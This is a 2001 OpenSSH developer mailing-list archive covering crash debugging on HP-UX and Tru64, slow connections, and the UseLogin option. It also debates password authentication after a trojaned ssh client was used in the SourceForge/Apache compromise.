From CLAD at chevron.com Fri Jun 1 00:20:33 2001 From: CLAD at chevron.com (Ladner, Eric (CLAD)) Date: Thu, 31 May 2001 07:20:33 -0700 Subject: Upgraded to 2.9p1 with no luck.. Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01C2A@chevron.com> The weird thing is it seems to be dying in the deflate fuction of the zlib directory. I've been running the same zlib library for well over a year (zlib 1.1.3, compiled from pristine source). I recompiled the library but that didn't seem to help. I turned on packet debugging and put some extra debug messages in, but it definitly dies in the compress routine calling the deflate() function. Thoughts? -----Original Message----- From: Lutz Jaenicke [mailto:Lutz.Jaenicke at aet.TU-Cottbus.DE] Sent: Friday, May 25, 2001 2:27 PM To: 'openssh-unix-dev at mindrot.org' Subject: Re: Upgraded to 2.9p1 with no luck.. On Fri, May 25, 2001 at 12:04:57PM -0700, Ladner, Eric (CLAD) wrote: > After upgrading to 2.9 (OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL > 0x0090600f) > I'm unable to ssh between two systems any more (the two that I've upgraded). > Below are some relevant snippets of debugging output around where the error > occurs. > Feel free to contact me regarding any additional information required. > > Output from "ssh -v -v -v pgppt" executed on a HP C240 workstation (HP-UX > 11.0, > PA-RISC 1.1): I am running 2.9p1 on HP-UX 10.20 (platforms are from 710 to C200), so there is certain probability that we can get it to run :-) > debug1: channel 0: new [client-session] > debug1: channel_new: 0 > debug1: send channel open 0 > Memory fault This is the point to step into debugging. From a Memory fault you should either get a core dump (but ssh is suid root, so you probably won't get one) or you can run it under a debugger and will end up at the location causing the memory fault. You must perform this as root, since ssh is suid root. Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From george at esa.nascom.nasa.gov Fri Jun 1 01:00:08 2001 From: george at esa.nascom.nasa.gov (George Dimitoglou) Date: Thu, 31 May 2001 11:00:08 -0400 (EDT) Subject: OpenSSH, sftp problems Message-ID: <200105311500.LAA05394@ruda.nascom.nasa.gov> Hi - We have been fighting this issue quite some time now and a posting on the general list some months ago did not provide any answers. So I thought the developers may have an insight. We are in a Tru64 4.0F environment, running C2 security and TCP Wrappers. We are using OpenSSH_2.5.1p2 OpenSSL 0.9.5 28 Feb 2000 Zlib 1.1.3 for remote sessions and all works ok with ssh but we have many problems with sftp. Namely, the session ends when a user issues an 'ls' command during a sftp session. The following debug output may give someone a hint. Any help would be greatly appreciated. host1.mydomain.com> sftp georged at machine.domain.gov : : (snipped authentication output) : : Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES ' debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0) sftp> ls SshFCGlob/sshfc_glob.c:299: Adding file . to file list without globbing... SshFCGlob/sshfc_glob.c:242: File list is at it's end. SshFCGlob/sshfc_glob.c:76: Destroying global data... SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be parsed. SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting recursion... SshFCRecurse/sshfc_recurse.c:877: Opening directory .... . Warning: ssh_packet_wrapper_input: invalid packet received: len 1399154545 closing the offending input channel. SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing... FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'. host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306: received exit status : 139 debug: Ssh2Common/sshcommon.c:660: num_channels now 0 debug: Got session close with exit_status=139 debug: destroying client struct... debug: uninitializing event loop host1.mydomain.com> ---------------------------------------- George Dimitoglou Emergent-IT, Space Sciences Division SOHO ESA/NASA Project Scientist Team Laboratory of Astronomy & Solar Physics NASA Goddard Space Flight Center Bldg. 26, G-1, Code 682.3 Greenbelt, MD 20771 george at esa.nascom.nasa.gov ---------------------------------------- From cmadams at hiwaay.net Fri Jun 1 01:26:22 2001 From: cmadams at hiwaay.net (Chris Adams) Date: Thu, 31 May 2001 10:26:22 -0500 Subject: OpenSSH, sftp problems In-Reply-To: <200105311500.LAA05394@ruda.nascom.nasa.gov>; from george@esa.nascom.nasa.gov on Thu, May 31, 2001 at 11:00:08AM -0400 References: <200105311500.LAA05394@ruda.nascom.nasa.gov> Message-ID: <20010531102622.G31192@HiWAAY.net> Once upon a time, George Dimitoglou said: > We are in a Tru64 4.0F environment, running C2 security and TCP > Wrappers. > > We are using OpenSSH_2.5.1p2 > OpenSSL 0.9.5 28 Feb 2000 > Zlib 1.1.3 > > for remote sessions and all works ok with ssh but we have many problems > with sftp. > > Namely, the session ends when a user issues an 'ls' command during a > sftp session. The following debug output may give someone a hint. It is fixed in OpenSSH 2.9p1. The problem is that sftp-server.c uses an "ll" modifier in snprintf when printing a 64 bit integer. On 32 bit platforms, "long long" is used for that type, which needs "ll". On 64 bit platforms (like Alpha), a 64 bit type is just a "long" and only needs "l". Tru64 doesn't understand "ll" and segfaults when it sees it (it actually could be used as a security hole I believe). OpenSSH 2.9p1 tests the library snprintf to see that it accepts "ll" and uses its own version if "ll" doesn't work. -- Chris Adams Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble. From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 1 01:37:04 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 31 May 2001 17:37:04 +0200 Subject: OpenSSH, sftp problems In-Reply-To: <200105311500.LAA05394@ruda.nascom.nasa.gov>; from george@esa.nascom.nasa.gov on Thu, May 31, 2001 at 11:00:08AM -0400 References: <200105311500.LAA05394@ruda.nascom.nasa.gov> Message-ID: <20010531173704.C17624@faui02.informatik.uni-erlangen.de> What kind of sftp program is this? looks like the commercial version and not openssh. On Thu, May 31, 2001 at 11:00:08AM -0400, George Dimitoglou wrote: > > Hi - > > We have been fighting this issue quite some time now and a posting on > the general list some months ago did not provide any answers. So I > thought the developers may have an insight. > > We are in a Tru64 4.0F environment, running C2 security and TCP > Wrappers. > > We are using OpenSSH_2.5.1p2 > OpenSSL 0.9.5 28 Feb 2000 > Zlib 1.1.3 > > for remote sessions and all works ok with ssh but we have many problems > with sftp. > > Namely, the session ends when a user issues an 'ls' command during a > sftp session. The following debug output may give someone a hint. > > > Any help would be greatly appreciated. > > > > host1.mydomain.com> sftp georged at machine.domain.gov > > : > : > (snipped authentication output) > : > : > Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES > ' > debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0) > sftp> ls > SshFCGlob/sshfc_glob.c:299: Adding file . to file list without globbing... > SshFCGlob/sshfc_glob.c:242: File list is at it's end. > SshFCGlob/sshfc_glob.c:76: Destroying global data... > SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be parsed. > SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting recursion... > SshFCRecurse/sshfc_recurse.c:877: Opening directory .... > . > Warning: ssh_packet_wrapper_input: invalid packet received: len 1399154545 closing the offending input channel. > SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing... > FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'. > host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306: received exit status : 139 > debug: Ssh2Common/sshcommon.c:660: num_channels now 0 > debug: Got session close with exit_status=139 > debug: destroying client struct... > debug: uninitializing event loop > > host1.mydomain.com> > > > ---------------------------------------- > George Dimitoglou > Emergent-IT, Space Sciences Division > > SOHO ESA/NASA Project Scientist Team > Laboratory of Astronomy & Solar Physics > NASA Goddard Space Flight Center > Bldg. 26, G-1, Code 682.3 > Greenbelt, MD 20771 > > george at esa.nascom.nasa.gov > ---------------------------------------- > > > From george at esa.nascom.nasa.gov Fri Jun 1 01:41:26 2001 From: george at esa.nascom.nasa.gov (George Dimitoglou) Date: Thu, 31 May 2001 11:41:26 -0400 (EDT) Subject: OpenSSH, sftp problems Message-ID: <200105311541.LAA05482@ruda.nascom.nasa.gov> Hi Markus - No, it is the free version. George > > What kind of sftp program is this? > > looks like the commercial version and not openssh. > > > On Thu, May 31, 2001 at 11:00:08AM -0400, George Dimitoglou wrote: > > > > Hi - > > > > We have been fighting this issue quite some time now and a posting on > > the general list some months ago did not provide any answers. So I > > thought the developers may have an insight. > > > > We are in a Tru64 4.0F environment, running C2 security and TCP > > Wrappers. > > > > We are using OpenSSH_2.5.1p2 > > OpenSSL 0.9.5 28 Feb 2000 > > Zlib 1.1.3 > > > > for remote sessions and all works ok with ssh but we have many problems > > with sftp. > > > > Namely, the session ends when a user issues an 'ls' command during a > > sftp session. The following debug output may give someone a hint. > > > > > > Any help would be greatly appreciated. > > > > > > > > host1.mydomain.com> sftp georged at machine.domain.gov > > > > : > > : > > (snipped authentication output) > > : > > : > > Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES > > ' > > debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0) > > sftp> ls > > SshFCGlob/sshfc_glob.c:299: Adding file . to file list without globbing... > > SshFCGlob/sshfc_glob.c:242: File list is at it's end. > > SshFCGlob/sshfc_glob.c:76: Destroying global data... > > SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be parsed. > > SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting recursion... > > SshFCRecurse/sshfc_recurse.c:877: Opening directory .... > > . > > Warning: ssh_packet_wrapper_input: invalid packet received: len 1399154545 closing the offending input channel. > > SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing... > > FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'. > > host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306: received exit status : 139 > > debug: Ssh2Common/sshcommon.c:660: num_channels now 0 > > debug: Got session close with exit_status=139 > > debug: destroying client struct... > > debug: uninitializing event loop > > > > host1.mydomain.com> > > > > > > ---------------------------------------- > > George Dimitoglou > > Emergent-IT, Space Sciences Division > > > > SOHO ESA/NASA Project Scientist Team > > Laboratory of Astronomy & Solar Physics > > NASA Goddard Space Flight Center > > Bldg. 26, G-1, Code 682.3 > > Greenbelt, MD 20771 > > > > george at esa.nascom.nasa.gov > > ---------------------------------------- > > > > > > ---------------------------------------- George Dimitoglou Emergent-IT, Space Sciences Division SOHO ESA/NASA Project Scientist Team Laboratory of Astronomy & Solar Physics NASA Goddard Space Flight Center Bldg. 26, G-1, Code 682.3 Greenbelt, MD 20771 george at esa.nascom.nasa.gov ---------------------------------------- From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 1 01:55:31 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 31 May 2001 17:55:31 +0200 Subject: OpenSSH, sftp problems In-Reply-To: <200105311541.LAA05482@ruda.nascom.nasa.gov>; from george@esa.nascom.nasa.gov on Thu, May 31, 2001 at 11:41:26AM -0400 References: <200105311541.LAA05482@ruda.nascom.nasa.gov> Message-ID: <20010531175531.D17624@faui02.informatik.uni-erlangen.de> On Thu, May 31, 2001 at 11:41:26AM -0400, George Dimitoglou wrote: > Hi Markus - > No, it is the free version. the free OpenSSH version does not print this: are you sure this is not a bug in ssh.com's ssh? > > > Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES > > > ' > > > debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0) > > > sftp> ls > > > SshFCGlob/sshfc_glob.c:299: Adding file . to file list without > globbing... > > > SshFCGlob/sshfc_glob.c:242: File list is at it's end. > > > SshFCGlob/sshfc_glob.c:76: Destroying global data... > > > SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be > parsed. > > > SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting > recursion... > > > SshFCRecurse/sshfc_recurse.c:877: Opening directory .... > > > . > > > Warning: ssh_packet_wrapper_input: invalid packet received: len > 1399154545 closing the offending input channel. > > > SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing... > > > FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'. > > > host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306: > received exit status : 139 > > > debug: Ssh2Common/sshcommon.c:660: num_channels now 0 > > > debug: Got session close with exit_status=139 > > > debug: destroying client struct... > > > debug: uninitializing event loop > > > > > > host1.mydomain.com> > > > > > > > > > ---------------------------------------- > > > George Dimitoglou > > > Emergent-IT, Space Sciences Division > > > > > > SOHO ESA/NASA Project Scientist Team > > > Laboratory of Astronomy & Solar Physics > > > NASA Goddard Space Flight Center > > > Bldg. 26, G-1, Code 682.3 > > > Greenbelt, MD 20771 > > > > > > george at esa.nascom.nasa.gov > > > ---------------------------------------- > > > > > > > > > > > > ---------------------------------------- > George Dimitoglou > Emergent-IT, Space Sciences Division > > SOHO ESA/NASA Project Scientist Team > Laboratory of Astronomy & Solar Physics > NASA Goddard Space Flight Center > Bldg. 26, G-1, Code 682.3 > Greenbelt, MD 20771 > > george at esa.nascom.nasa.gov > ---------------------------------------- > > > From Lutz.Jaenicke at aet.TU-Cottbus.DE Fri Jun 1 02:13:47 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 31 May 2001 18:13:47 +0200 Subject: Upgraded to 2.9p1 with no luck.. In-Reply-To: <8F88657F29DFD11189ED0008C728C6B006E01C2A@chevron.com>; from CLAD@chevron.com on Thu, May 31, 2001 at 07:20:33AM -0700 References: <8F88657F29DFD11189ED0008C728C6B006E01C2A@chevron.com> Message-ID: <20010531181346.B15511@ws01.aet.tu-cottbus.de> On Thu, May 31, 2001 at 07:20:33AM -0700, Ladner, Eric (CLAD) wrote: > The weird thing is it seems to be dying in the deflate fuction of the > zlib directory. I've been running the same zlib library for well over > a year (zlib 1.1.3, compiled from pristine source). I recompiled the > library but that didn't seem to help. I turned on packet debugging > and put some extra debug messages in, but it definitly dies in the > compress routine calling the deflate() function. The deflate() routine will deflate the data into preallocated memory, so zlib may still be innocent... > > Output from "ssh -v -v -v pgppt" executed on a HP C240 workstation (HP-UX > > 11.0, > > PA-RISC 1.1): What compilers did you use? (Wild guesses, because I am running out of ideas :-) Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From CLAD at chevron.com Fri Jun 1 04:24:27 2001 From: CLAD at chevron.com (Ladner, Eric (CLAD)) Date: Thu, 31 May 2001 11:24:27 -0700 Subject: Upgraded to 2.9p1 with no luck.. Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01C38@chevron.com> The only one I have that will compile ANSI-C is gcc 2.95.2. I used whatever default compile optinos that configure devined.. E -----Original Message----- From: Lutz Jaenicke [mailto:Lutz.Jaenicke at aet.TU-Cottbus.DE] Sent: Thursday, May 31, 2001 11:14 AM To: 'openssh-unix-dev at mindrot.org' Subject: Re: Upgraded to 2.9p1 with no luck.. On Thu, May 31, 2001 at 07:20:33AM -0700, Ladner, Eric (CLAD) wrote: > The weird thing is it seems to be dying in the deflate fuction of the > zlib directory. I've been running the same zlib library for well over > a year (zlib 1.1.3, compiled from pristine source). I recompiled the > library but that didn't seem to help. I turned on packet debugging > and put some extra debug messages in, but it definitly dies in the > compress routine calling the deflate() function. The deflate() routine will deflate the data into preallocated memory, so zlib may still be innocent... > > Output from "ssh -v -v -v pgppt" executed on a HP C240 workstation (HP-UX > > 11.0, > > PA-RISC 1.1): What compilers did you use? (Wild guesses, because I am running out of ideas :-) Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From jelagor at att.net Fri Jun 1 05:39:41 2001 From: jelagor at att.net (jelagor at att.net) Date: Thu, 31 May 2001 19:39:41 +0000 Subject: openssh 2.9 slow connections Message-ID: <20010531193941.YAQX29100.mtiwmhc22.worldnet.att.net@webmail.worldnet.att.net> To anyone, I have installed openssh 2.9 on Solaris 2.7 and the default setup is slow. It takes about 4-5 minutes to make the connection. I am connecting to a Solaris 2.8 with openssh 2.3 on it. A RH Linux 6.2 version connects to the same machine without the delay. Why? I have seen other similar postings expressing delays in openssh 2.9. ftp and telnet work find as always with the same DNS setup as always. Does openssh use reverse DNS? This may explain it. Jim LaGore jelagor at att.net From tomh at po.crl.go.jp Fri Jun 1 12:24:49 2001 From: tomh at po.crl.go.jp (Tom Holroyd) Date: Fri, 1 Jun 2001 11:24:49 +0900 (JST) Subject: recent breakins Message-ID: >From http://www.apache.org/info/20010519-hack.html: "The ssh client at SourceForge had been compromised to log outgoing names and passwords, so the cracker was thus able get a shell on apache.org." user's ssh --> SF's ssh --> apache.org's sshd So basically the user's password was entered in the clear to an untrusted program (SF's ssh). Never mind that the links were encrypted, the ssh program on SF needed to know the user's password on apache.org, in the clear. Obviously, the user could have / should have run ssh locally to connect directly to apache.org. But that's not the ideal solution. The ideal solution requires that passwords should never, ever, be allowed to exist in the clear anywhere but on the user's local machine. This is doable now, over a single link, with SRP. But what about multiple links? It should be possible to forward authentication requests back to the user's keyboard. The SRP protocol can be forwarded over any number of links, *even through a trojaned ssh* without revealing any information that a cracker can use. What mechanisms exist within ssh/sshd that would allow a remote sshd to establish an authentication protocol conversation with a local ssh, possibly over several links? Remember that the goal is that the user's password should never appear in the clear on any computer other than the user's own. Is this something that needs to be added to the agent? Or can it be done directly within ssh? From mugz at x-mafia.org Fri Jun 1 16:09:57 2001 From: mugz at x-mafia.org (mugz) Date: Fri, 1 Jun 2001 02:09:57 -0400 (EDT) Subject: another bug report In-Reply-To: <20010524125150.D22475@folly> Message-ID: I tracked this one down. I am running OpenSSH_2.9p1 and if a user logs in whith securecrt and uses the "disconect" button to disconnect from the shell I get this error in the log: Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill 16131: Operation not permitted Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill 16131: Operation not permitted Also, when I type: last -30 | grep still It shows them as still logged in, even though they have long sense disconnected. This error does not occur if they use "exit" to exit the shell, also I do not see this same error in PuTTY. mugz From gert at greenie.muc.de Fri Jun 1 18:12:56 2001 From: gert at greenie.muc.de (Gert Doering) Date: Fri, 1 Jun 2001 10:12:56 +0200 Subject: recent breakins In-Reply-To: ; from Tom Holroyd on Fri, Jun 01, 2001 at 11:24:49AM +0900 References: Message-ID: <20010601101256.B22854@greenie.muc.de> Hi, On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote: > But what about multiple links? It should be possible to forward > authentication requests back to the user's keyboard. The SRP protocol can > be forwarded over any number of links, *even through a trojaned ssh* > without revealing any information that a cracker can use. Same with agent forwarding and using RSAAuthentication. gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From tomh at po.crl.go.jp Fri Jun 1 18:52:50 2001 From: tomh at po.crl.go.jp (Tom Holroyd) Date: Fri, 1 Jun 2001 17:52:50 +0900 (JST) Subject: recent breakins In-Reply-To: <20010601101256.B22854@greenie.muc.de> Message-ID: On Fri, 1 Jun 2001, Gert Doering wrote: > On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote: > > But what about multiple links? It should be possible to forward > > authentication requests back to the user's keyboard. The SRP protocol can > > be forwarded over any number of links, *even through a trojaned ssh* > > without revealing any information that a cracker can use. > > Same with agent forwarding and using RSAAuthentication. True. Too bad the guy wasn't using it. Why wasn't he using it? Perhaps OpenSSH should simply disallow password authentication? This type of man-in-the-middle attack (trojaned ssh) is not theoretical anymore, and password authentication is broken. The question is, can password authentication be (securely) forwarded? If not, then we really should remove password authentication as an option. From olemx at ans.pl Fri Jun 1 22:47:21 2001 From: olemx at ans.pl (Krzysztof Oledzki) Date: Fri, 1 Jun 2001 14:47:21 +0200 (CEST) Subject: Problem with OpenSSH with UseLogin.. AGAIN!!! In-Reply-To: <20010526114913.A2514@folly> Message-ID: On Sat, 26 May 2001, Markus Friedl wrote: > On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote: > > Its not a bug, its a feature :-) Seriously, if UseLogin is selected > > then the sys-admin has dictated that all authentictions must pass though > > /bin/login - usually for local secuirty reasons. Disabling this kind of > > defeats the purpose of the option. > > no, this is not true. > > use_login is ignored if you specify commands. > So? Someone will fix it!? It is quite stiupid to keep this bug!!! Best regards, Krzysztof Oledzki From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 1 22:48:52 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 1 Jun 2001 14:48:52 +0200 Subject: Problem with OpenSSH with UseLogin.. AGAIN!!! In-Reply-To: ; from olemx@ans.pl on Fri, Jun 01, 2001 at 02:47:21PM +0200 References: <20010526114913.A2514@folly> Message-ID: <20010601144852.A16295@faui02.informatik.uni-erlangen.de> On Fri, Jun 01, 2001 at 02:47:21PM +0200, Krzysztof Oledzki wrote: > > > On Sat, 26 May 2001, Markus Friedl wrote: > > > On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote: > > > Its not a bug, its a feature :-) Seriously, if UseLogin is selected > > > then the sys-admin has dictated that all authentictions must pass though > > > /bin/login - usually for local secuirty reasons. Disabling this kind of > > > defeats the purpose of the option. > > > > no, this is not true. > > > > use_login is ignored if you specify commands. > > > So? Someone will fix it!? It is quite stiupid to keep this bug!!! no, it's not a bug, it's a feature. From pekkas at netcore.fi Fri Jun 1 23:08:16 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Fri, 1 Jun 2001 16:08:16 +0300 (EEST) Subject: Problem with OpenSSH with UseLogin.. AGAIN!!! In-Reply-To: <20010601144852.A16295@faui02.informatik.uni-erlangen.de> Message-ID: On Fri, 1 Jun 2001, Markus Friedl wrote: > On Fri, Jun 01, 2001 at 02:47:21PM +0200, Krzysztof Oledzki wrote: > > > > > > On Sat, 26 May 2001, Markus Friedl wrote: > > > > > On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote: > > > > Its not a bug, its a feature :-) Seriously, if UseLogin is selected > > > > then the sys-admin has dictated that all authentictions must pass though > > > > /bin/login - usually for local secuirty reasons. Disabling this kind of > > > > defeats the purpose of the option. > > > > > > no, this is not true. > > > > > > use_login is ignored if you specify commands. > > > > > So? Someone will fix it!? It is quite stiupid to keep this bug!!! > > no, it's not a bug, it's a feature. I think some people rely on UseLogin to perform additional login logging, checking etc. For them, this might appear as a huuuge problem. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 1 23:37:35 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 1 Jun 2001 15:37:35 +0200 Subject: Problem with OpenSSH with UseLogin.. AGAIN!!! In-Reply-To: ; from pekkas@netcore.fi on Fri, Jun 01, 2001 at 04:08:16PM +0300 References: <20010601144852.A16295@faui02.informatik.uni-erlangen.de> Message-ID: <20010601153735.B16295@faui02.informatik.uni-erlangen.de> On Fri, Jun 01, 2001 at 04:08:16PM +0300, Pekka Savola wrote: > On Fri, 1 Jun 2001, Markus Friedl wrote: > > > On Fri, Jun 01, 2001 at 02:47:21PM +0200, Krzysztof Oledzki wrote: > > > > > > > > > On Sat, 26 May 2001, Markus Friedl wrote: > > > > > > > On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote: > > > > > Its not a bug, its a feature :-) Seriously, if UseLogin is selected > > > > > then the sys-admin has dictated that all authentictions must pass though > > > > > /bin/login - usually for local secuirty reasons. Disabling this kind of > > > > > defeats the purpose of the option. > > > > > > > > no, this is not true. > > > > > > > > use_login is ignored if you specify commands. > > > > > > > So? Someone will fix it!? It is quite stiupid to keep this bug!!! > > > > no, it's not a bug, it's a feature. > > I think some people rely on UseLogin to perform additional login logging, > checking etc. For them, this might appear as a huuuge problem. i don't think that ssh ever did this. login is just used to update wtmp, print "you have new mail" however, you cannot say /usr/bin/login user -c command so you cannot use login(1) for command execution. but for command execution, you don't need to touch wtmp or print "you have new mail". even the manpage says: UseLogin Specifies whether login(1) is used for interactive login ses- sions. Note that login(1) is never used for remote command exe- cution. The default is ``no''. but it would be better if i never did accept the patch that added use_login....... From GILBERT.R.LOOMIS at saic.com Fri Jun 1 23:46:09 2001 From: GILBERT.R.LOOMIS at saic.com (Loomis, Rip) Date: Fri, 1 Jun 2001 09:46:09 -0400 Subject: Disabling Password-based auth? (was RE: recent breakins) Message-ID: <791BD3CB503DD411A6510008C7CF647701F40BE0@col-581-exs01.cist.saic.com> All-- But it's not as simple as forwarding the password-based authentication. Regardless of what method was used to SSH from system one (user's) to system two (SF), the user then started up *a second* SSH session to go from two (SF) to three (Apache). There is no effective way for any authentication information from the first session to be passed to the second, in my mind. Remember that the SF servers had suffered a root compromise--so any non-password-based authentication that would allow the user on the SF system to get to the Apache systems could have been equally compromised. The correct fix is *not* to disable password-based authentication, but to ensure that users understand that SSH is not a silver bullet. An SSH session should generally only be initiated from a more secure system to a less secure system--in my case, the system on my desk is one that I have personally hardened and that is closely monitored, so I have no problem using SSH to go out to my ISP and read mail. I would think *very* carefully before using SSH in reverse, since my ISP's systems are (IMHO) much less secure. I'm as appalled by what happened to SF and Apache as anyone else, but I would ask that we work on the user awareness issue, which I believe is the real "root" problem (pardon the pun). For the cases where someone needs to get from system A to system B with some basic level of security and doesn't have any other credentials/authentication available, there really is no substitute for password-based authentication. -- Rip Loomis Brainbench MVP for Internet Security http://www.brainbench.com (Transcript 1923411) > -----Original Message----- > From: Tom Holroyd [mailto:tomh at po.crl.go.jp] > Sent: Friday, June 01, 2001 4:53 AM > To: openssh-unix-dev at mindrot.org > Subject: Re: recent breakins > > > On Fri, 1 Jun 2001, Gert Doering wrote: > > > On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote: > > > But what about multiple links? It should be possible to forward > > > authentication requests back to the user's keyboard. The > SRP protocol can > > > be forwarded over any number of links, *even through a > trojaned ssh* > > > without revealing any information that a cracker can use. > > > > Same with agent forwarding and using RSAAuthentication. > > True. Too bad the guy wasn't using it. Why wasn't he using it? > > Perhaps OpenSSH should simply disallow password authentication? > > This type of man-in-the-middle attack (trojaned ssh) is not > theoretical > anymore, and password authentication is broken. > > > The question is, can password authentication be (securely) > forwarded? If > not, then we really should remove password authentication as > an option. > From GILBERT.R.LOOMIS at saic.com Fri Jun 1 23:56:14 2001 From: GILBERT.R.LOOMIS at saic.com (Loomis, Rip) Date: Fri, 1 Jun 2001 09:56:14 -0400 Subject: Disabling Password-based auth? (was RE: recent breakins) Message-ID: <791BD3CB503DD411A6510008C7CF647701F40BE1@col-581-exs01.cist.saic.com> Crap. I hit send too fast. Last sentence in first paragraph should have read "no completely secure way" for authentication to be passed-- because the agent-based forwarding program could have been compromised as well--except for the cases already mentioned such as SRP and RSAAuth where the auth. information is better protected. Even if the SF server had been capable of forwarding the password auth. the Apache compromise could still have happened--password authentication really isn't secure enough for most cases. Bottom line is that too many people use password-based authentication, but some of them *do* need it. More people *should* be moving to RSAAuth or SRP, but both methods require user training. Forcing that by disabling a long-standing feature is not the best to proceed IMHO. Getting people to think about what they're doing is better--but raising user awareness is one of those things that security always seems to depend upon... > -----Original Message----- > From: Loomis, Rip > Sent: Friday, June 01, 2001 9:46 AM > To: openssh-unix-dev at mindrot.org > Subject: Disabling Password-based auth? (was RE: recent breakins) > > > All-- > > But it's not as simple as forwarding the password-based > authentication. Regardless of what method was used to > SSH from system one (user's) to system two (SF), the > user then started up *a second* SSH session to go > from two (SF) to three (Apache). There is no effective > way for any authentication information from the first > session to be passed to the second, in my mind. > > Remember that the SF servers had suffered a root > compromise--so any non-password-based authentication > that would allow the user on the SF system to get to > the Apache systems could have been equally compromised. > > The correct fix is *not* to disable password-based > authentication, but to ensure that users understand > that SSH is not a silver bullet. An SSH session should > generally only be initiated from a more secure system > to a less secure system--in my case, the system on my > desk is one that I have personally hardened and that > is closely monitored, so I have no problem using SSH > to go out to my ISP and read mail. I would think > *very* carefully before using SSH in reverse, since my > ISP's systems are (IMHO) much less secure. > > I'm as appalled by what happened to SF and Apache as > anyone else, but I would ask that we work on the > user awareness issue, which I believe is the real > "root" problem (pardon the pun). For the cases > where someone needs to get from system A to system B > with some basic level of security and doesn't have any > other credentials/authentication available, there really > is no substitute for password-based authentication. > > -- > Rip Loomis > Brainbench MVP for Internet Security > http://www.brainbench.com (Transcript 1923411) > > > > -----Original Message----- > > From: Tom Holroyd [mailto:tomh at po.crl.go.jp] > > Sent: Friday, June 01, 2001 4:53 AM > > To: openssh-unix-dev at mindrot.org > > Subject: Re: recent breakins > > > > > > On Fri, 1 Jun 2001, Gert Doering wrote: > > > > > On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote: > > > > But what about multiple links? It should be possible to forward > > > > authentication requests back to the user's keyboard. The > > SRP protocol can > > > > be forwarded over any number of links, *even through a > > trojaned ssh* > > > > without revealing any information that a cracker can use. > > > > > > Same with agent forwarding and using RSAAuthentication. > > > > True. Too bad the guy wasn't using it. Why wasn't he using it? > > > > Perhaps OpenSSH should simply disallow password authentication? > > > > This type of man-in-the-middle attack (trojaned ssh) is not > > theoretical > > anymore, and password authentication is broken. > > 